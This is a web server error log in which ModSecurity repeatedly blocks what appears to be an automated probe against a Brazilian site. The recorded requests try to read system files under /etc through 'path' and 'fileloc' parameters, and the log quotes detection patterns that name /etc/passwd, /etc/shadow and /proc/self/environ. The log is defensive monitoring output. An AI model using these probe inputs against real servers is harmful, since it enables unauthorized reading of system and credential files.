[Fri Mar 20 06:53:43.628774 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.34:42008] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZJ7ninkcc-iUj5ApQjgAAA4s"]
[Fri Mar 20 06:53:44.202158 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.114:42018] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZKAF0L0L-SsrnPo5aawAAAsg"]
[Fri Mar 20 06:53:44.389708 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.59:42026] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZKLninkcc-iUj5ApQkAAAA5c"]
[Fri Mar 20 06:53:45.056453 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.51:42040] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZKda6ubjKNq_cu4bFUQAAA1E"]
[Fri Mar 20 06:53:45.311731 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.120:42048] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZKda6ubjKNq_cu4bFUwAAA0Q"]
[Fri Mar 20 06:53:45.555619 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.95:42054] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZKV1pVZ5mVmJwsFMhfgAAAE8"]
[Fri Mar 20 06:53:45.968919 2026] [:error] [pid 7893:tid 140411733534464] [client 57.141.18.65:42060] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZKRCii7xarUs8iHZZywAAAgE"]
[Fri Mar 20 06:53:46.491043 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.104:42070] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZKuoXxyEfFpUF8f9z8gAAAVU"]
[Fri Mar 20 06:53:46.492836 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.116:42072] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZKjJ3M9BSuKP7CAYLBwAAAJg"]
[Fri Mar 20 06:53:47.109789 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.22:42082] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZK11pVZ5mVmJwsFMhfwAAAE0"]
[Fri Mar 20 06:53:47.400434 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.80:42090] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZKzJ3M9BSuKP7CAYLCgAAAJA"]
[Fri Mar 20 06:53:47.458904 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.71:42092] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZK9a6ubjKNq_cu4bFVgAAA0A"]
[Fri Mar 20 06:53:47.970119 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.35:42098] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZK9a6ubjKNq_cu4bFXAAAA0k"]
[Fri Mar 20 06:53:48.237009 2026] [:error] [pid 10189:tid 140411683178240] [client 57.141.18.60:42112] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZLDJ3M9BSuKP7CAYLDQAAAIc"]
[Fri Mar 20 06:53:48.562806 2026] [:error] [pid 21219:tid 140411741927168] [client 57.141.18.117:42114] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZLPXLqtnMIWvjpaKMhQAAAoA"]
[Fri Mar 20 06:53:48.950509 2026] [:error] [pid 10189:tid 140411599251200] [client 57.141.18.48:42120] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZLDJ3M9BSuKP7CAYLEAAAAJE"]
[Fri Mar 20 06:53:49.106429 2026] [:error] [pid 10189:tid 140411699963648] [client 57.141.18.123:42124] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZLTJ3M9BSuKP7CAYLEgAAAIU"]
[Fri Mar 20 06:53:49.767772 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.119:42130] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZLTJ3M9BSuKP7CAYLHAAAAJA"]
[Fri Mar 20 06:53:49.914550 2026] [:error] [pid 7235:tid 140411616036608] [client 57.141.18.52:42142] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZLfqxLDW4GITHUkTXFQAAAQ8"]
[Fri Mar 20 06:53:50.394565 2026] [:error] [pid 11642:tid 140411716749056] [client 57.141.18.106:42154] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZLrninkcc-iUj5ApQlwAAA4M"]
[Fri Mar 20 06:53:50.495105 2026] [:error] [pid 31215:tid 140411557287680] [client 57.141.18.55:42156] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZLgF0L0L-SsrnPo5abAAAAtY"]
[Fri Mar 20 06:53:50.587774 2026] [:error] [pid 11642:tid 140411540502272] [client 57.141.18.94:42158] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZLrninkcc-iUj5ApQmAAAA5g"]
[Fri Mar 20 06:53:51.477974 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.27:42172] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZL7ninkcc-iUj5ApQmgAAA4A"]
[Fri Mar 20 06:53:51.782693 2026] [:error] [pid 11642:tid 140411624429312] [client 57.141.18.23:42180] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZL7ninkcc-iUj5ApQnAAAA44"]
[Fri Mar 20 06:53:51.784650 2026] [:error] [pid 9818:tid 140411557287680] [client 57.141.18.82:42182] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZL11pVZ5mVmJwsFMhgAAAAFY"]
[Fri Mar 20 06:53:52.136527 2026] [:error] [pid 7235:tid 140411733534464] [client 57.141.18.53:42190] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZMPqxLDW4GITHUkTXFgAAAQE"]
[Fri Mar 20 06:53:52.861344 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.30:42198] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZMPHIg5MgXLBnicPrDAAAAc0"]
[Fri Mar 20 06:53:53.041164 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.1:42204] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZMfXLqtnMIWvjpaKMhgAAAoQ"]
[Fri Mar 20 06:53:53.334917 2026] [:error] [pid 7893:tid 140411691570944] [client 57.141.18.96:42208] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZMRCii7xarUs8iHZZzQAAAgY"]
